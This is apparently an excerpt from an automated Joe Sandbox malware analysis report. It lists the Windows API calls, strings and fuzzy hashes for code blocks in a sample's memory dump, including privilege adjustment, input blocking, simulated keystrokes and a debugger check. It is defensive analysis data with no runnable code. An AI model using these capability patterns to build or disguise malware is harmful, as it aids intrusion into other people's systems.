                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: 96a24f996bc7f5468e8ae30a63e771211c22b323391fd67f8ba817c91b44da45
                                                                                                    • Instruction ID: 4894874997a0fdd0a11726a14ca612397caa6a68e3b83767bf1f5c21255744d4
                                                                                                    • Opcode Fuzzy Hash: 96a24f996bc7f5468e8ae30a63e771211c22b323391fd67f8ba817c91b44da45
                                                                                                    • Instruction Fuzzy Hash: CF31D67590121CABCB21DF64DD88BDDBBB8AF18310F5041EAE81CA7260EB349F818F44
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00B151DA
                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B15238
                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00B152A1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                    • String ID:
                                                                                                    • API String ID: 1682464887-0
                                                                                                    • Opcode ID: 2fe8545d820e712b39501263115ef9524de6010a4867824a9cc0f6c0487571a9
                                                                                                    • Instruction ID: 8e40239f9f605685a6cf532627f538aaddedec97fba263a988bcf6a65f0b83da
                                                                                                    • Opcode Fuzzy Hash: 2fe8545d820e712b39501263115ef9524de6010a4867824a9cc0f6c0487571a9
                                                                                                    • Instruction Fuzzy Hash: 0F315E75A00618DFDB00DF94D884EAEBBF4FF49314F548099E805AB3A2DB31E855CB90
                                                                                                    APIs
                                                                                                      • Part of subcall function 00ABFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0668
                                                                                                      • Part of subcall function 00ABFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0685
                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
                                                                                                    • GetLastError.KERNEL32 ref: 00B0174A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 577356006-0
                                                                                                    • Opcode ID: 6936b6458da53d88c1ca8bd769a5230f0d8c5d4c8feb1910c3aa5c3c12681a4d
                                                                                                    • Instruction ID: 530f086f7edc64d87d0b71c22aef63f31e40f14405a6cd79c5b2f4a12ebc183e
                                                                                                    • Opcode Fuzzy Hash: 6936b6458da53d88c1ca8bd769a5230f0d8c5d4c8feb1910c3aa5c3c12681a4d
                                                                                                    • Instruction Fuzzy Hash: 07119EB2504304AFD718AF58DDC6DAABBFDEB44714B24856EE05657281EB70FC418B24
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B0D608
                                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00B0D645
                                                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B0D650
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 33631002-0
                                                                                                    • Opcode ID: b81a306616d80905d28b9de3971580c0745d76dedb1c49eff5e0c034c1823eab
                                                                                                    • Instruction ID: 2be3cf4d533abf26f3d1ceffd202dd0c8270e3822ea231d0506079c3c56fabb8
                                                                                                    • Opcode Fuzzy Hash: b81a306616d80905d28b9de3971580c0745d76dedb1c49eff5e0c034c1823eab
                                                                                                    • Instruction Fuzzy Hash: 64113C75E05228BFDB108F959C45FAFBFBCEB45B50F108155F904F7290D6704A058BA1
                                                                                                    APIs
                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B0168C
                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B016A1
                                                                                                    • FreeSid.ADVAPI32(?), ref: 00B016B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 3429775523-0
                                                                                                    • Opcode ID: d6584c164b1cbed5792b9aabc556469955ff9567b3809941f901b7667cd82db1
                                                                                                    • Instruction ID: 1cf6db109a0d0aea3987522bbaa298f0969b03f98ba20ced62f9295ee7eda7a4
                                                                                                    • Opcode Fuzzy Hash: d6584c164b1cbed5792b9aabc556469955ff9567b3809941f901b7667cd82db1
                                                                                                    • Instruction Fuzzy Hash: 6EF0F47195030DFBDB00DFE49D89AAEBBBCEB08704F5049A5E501E2181E774AA448B50
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000,?,00AD28E9), ref: 00AC4D09
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000,?,00AD28E9), ref: 00AC4D10
                                                                                                    • ExitProcess.KERNEL32 ref: 00AC4D22
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 1642c343c5e8f1c386ce92e5d0afebaa863319d028bd379b00f53d273f543884
                                                                                                    • Instruction ID: e9850dca7bf09943b4543370d02be70df7c3c45f1fe902fd89bcf49c075c4bc7
                                                                                                    • Opcode Fuzzy Hash: 1642c343c5e8f1c386ce92e5d0afebaa863319d028bd379b00f53d273f543884
                                                                                                    • Instruction Fuzzy Hash: 2AE0B631000548AFCF12BFA4DE1AF993F69EB45791B214418FC06AB222CB35DD52DB88
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /
                                                                                                    • API String ID: 0-2043925204
                                                                                                    • Opcode ID: fa9223fec98cd234201c5cc3f6566e086de183c366bc2a8dc9953efcc7f5f419
                                                                                                    • Instruction ID: 24cb22d9d516a7e509840e93b267567fd68bd9b4fe753b57903714ff06eaf152
                                                                                                    • Opcode Fuzzy Hash: fa9223fec98cd234201c5cc3f6566e086de183c366bc2a8dc9953efcc7f5f419
                                                                                                    • Instruction Fuzzy Hash: 76413B7650021A6FCB24AFB9CC4DEFBB778EB84724F50426AF916DB280E6709D41CB50
                                                                                                    APIs
                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00AFD28C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    • String ID: X64
                                                                                                    • API String ID: 2645101109-893830106
                                                                                                    • Opcode ID: f7e6d15a7ca0b64520f722759b43a7fcdd4027e2f2f76f2de29dabd7675f71c9
                                                                                                    • Instruction ID: f70148f062015951dd541a957f27c0c569963e3cb3a471bf0a3736578b515e6b
                                                                                                    • Opcode Fuzzy Hash: f7e6d15a7ca0b64520f722759b43a7fcdd4027e2f2f76f2de29dabd7675f71c9
                                                                                                    • Instruction Fuzzy Hash: F2D0C9B480111DEACB94DB90DC88DDDB77CBB04305F200151F106A2000DB3096488F10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                    • Instruction ID: 97fbe2640c45908b6c2dcf7f344587accccfcbd519f866ca847d1e2fba3bab17
                                                                                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                    • Instruction Fuzzy Hash: 4C020C71E002199BDF14CFA9C980BADBBF1EF48324F25816ED919E7384D731AE418B94
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B16918
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B16961
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: 6d68a6c8d03c2ec97a15aeeaa2b0b54ef3b482a80791057d90b6fd75db832077
                                                                                                    • Instruction ID: f2c2579ec45dfaff0bc35ec3f531afc25947cb3f1970c0b0e302182c418a5723
                                                                                                    • Opcode Fuzzy Hash: 6d68a6c8d03c2ec97a15aeeaa2b0b54ef3b482a80791057d90b6fd75db832077
                                                                                                    • Instruction Fuzzy Hash: 841193316042119FD710DF69D884A1ABBE5FF89328F54C699E4698F2A2CB30EC45CB91
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B24891,?,?,00000035,?), ref: 00B137E4
                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00B24891,?,?,00000035,?), ref: 00B137F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 3479602957-0
                                                                                                    • Opcode ID: 1afc5ba809fdc3885cac9b186a7a272b236f43114ebf8954f184c87d7563e351
                                                                                                    • Instruction ID: d689ae150393fbea821ae4ac040ab034115c86138ecdf7a565bb2a31b84be960
                                                                                                    • Opcode Fuzzy Hash: 1afc5ba809fdc3885cac9b186a7a272b236f43114ebf8954f184c87d7563e351
                                                                                                    • Instruction Fuzzy Hash: 04F0A0B16042282AE72027A68D49FEB3AAEEF85B61F000175B509E32C1DA609D4487B1
                                                                                                    APIs
                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B0B25D
                                                                                                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00B0B270
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InputSendkeybd_event
                                                                                                    • String ID:
                                                                                                    • API String ID: 3536248340-0
                                                                                                    • Opcode ID: e896179e57b67fd87225983cc2632e5b28ded55df5ed3c5db04bcc94c1885c29
                                                                                                    • Instruction ID: fcb10bcb7c60e240f6ab8c3e2d108fe24756976ca04397e1a57447000f59bf53
                                                                                                    • Opcode Fuzzy Hash: e896179e57b67fd87225983cc2632e5b28ded55df5ed3c5db04bcc94c1885c29
                                                                                                    • Instruction Fuzzy Hash: 03F0177180428EABDB059FA0C806BAE7FB4FF08309F10804AF965A61A2C77986119F94
                                                                                                    APIs
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B011FC), ref: 00B010D4
                                                                                                    • CloseHandle.KERNEL32(?,?,00B011FC), ref: 00B010E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 81990902-0
                                                                                                    • Opcode ID: 6a6b1c0e6767ff5e2f83bbd9d6417896342576ad5c33aea966faf3b2a6f8f2de
                                                                                                    • Instruction ID: 3b90e3b907561630e951299e25bda765a834127c15f53cc79ab7a473dc7b46e1
                                                                                                    • Opcode Fuzzy Hash: 6a6b1c0e6767ff5e2f83bbd9d6417896342576ad5c33aea966faf3b2a6f8f2de
                                                                                                    • Instruction Fuzzy Hash: 42E0BF72014610AEE7252B55FD05EB77BEDEB04310B24882DF5A6914B1DB62ACA0DB54
                                                                                                    Strings
                                                                                                    • Variable is not of type 'Object'., xrefs: 00AF0C40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Variable is not of type 'Object'.
                                                                                                    • API String ID: 0-1840281001
                                                                                                    • Opcode ID: ed372c90487b2d2cfa294f42a6a870c8cc57d9328ef547fc4e828443fa758162
                                                                                                    • Instruction ID: f38e47a72dbde2f2bf285030c87c474d4a73c0b1765a355ae8785c4dc8e50769
                                                                                                    • Opcode Fuzzy Hash: ed372c90487b2d2cfa294f42a6a870c8cc57d9328ef547fc4e828443fa758162
                                                                                                    • Instruction Fuzzy Hash: EE327A70900218DFEF14DF94C985EFDB7B5BF06324F148069E906AB292DB75AE46CB60
                                                                                                    APIs
                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AD6766,?,?,00000008,?,?,00ADFEFE,00000000), ref: 00AD6998
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise
                                                                                                    • String ID:
                                                                                                    • API String ID: 3997070919-0
                                                                                                    • Opcode ID: b0bd1e54d2e403f2a6a8669942e1ac91b47d9fa12aead09639baf1b389947677
                                                                                                    • Instruction ID: 0aed528b5213d842346f212ceba7c245a8b4df843c77308b55a39fa384f21c82
                                                                                                    • Opcode Fuzzy Hash: b0bd1e54d2e403f2a6a8669942e1ac91b47d9fa12aead09639baf1b389947677
                                                                                                    • Instruction Fuzzy Hash: 17B129316106099FD715CF28C48AB697BB0FF45364F29865AE8DACF3A2C735E991CB40
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID: 0-3916222277
                                                                                                    • Opcode ID: c3bf79ff41f3b4ca8ef7ec5f09283dfc4a10a0523a3a396755799034ac8a855f
                                                                                                    • Instruction ID: d8e2d599b95d74817103b0048616e3944647852b8aadf08cbf42194dd773e1a4
                                                                                                    • Opcode Fuzzy Hash: c3bf79ff41f3b4ca8ef7ec5f09283dfc4a10a0523a3a396755799034ac8a855f
                                                                                                    • Instruction Fuzzy Hash: 561251759102299FCB14CF98C8806FEB7F5FF48710F14819AE949EB256DB749E81CBA0
                                                                                                    APIs
                                                                                                    • BlockInput.USER32(00000001), ref: 00B1EABD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BlockInput
                                                                                                    • String ID:
                                                                                                    • API String ID: 3456056419-0
                                                                                                    • Opcode ID: 2ae5324069f7a68d6bfc54776e0a58100bd9d05cec60c12a809bf2c7d570e214
                                                                                                    • Instruction ID: c9f304aecbc53b01249350fb6f01c32488d1837486d07ea01fbe0cd6926616d9
                                                                                                    • Opcode Fuzzy Hash: 2ae5324069f7a68d6bfc54776e0a58100bd9d05cec60c12a809bf2c7d570e214
                                                                                                    • Instruction Fuzzy Hash: 0EE04F322102049FD710EF69D945E9AFBE9EF99770F008456FC4AD7391DB70E8808BA1
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00AC03EE), ref: 00AC09DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
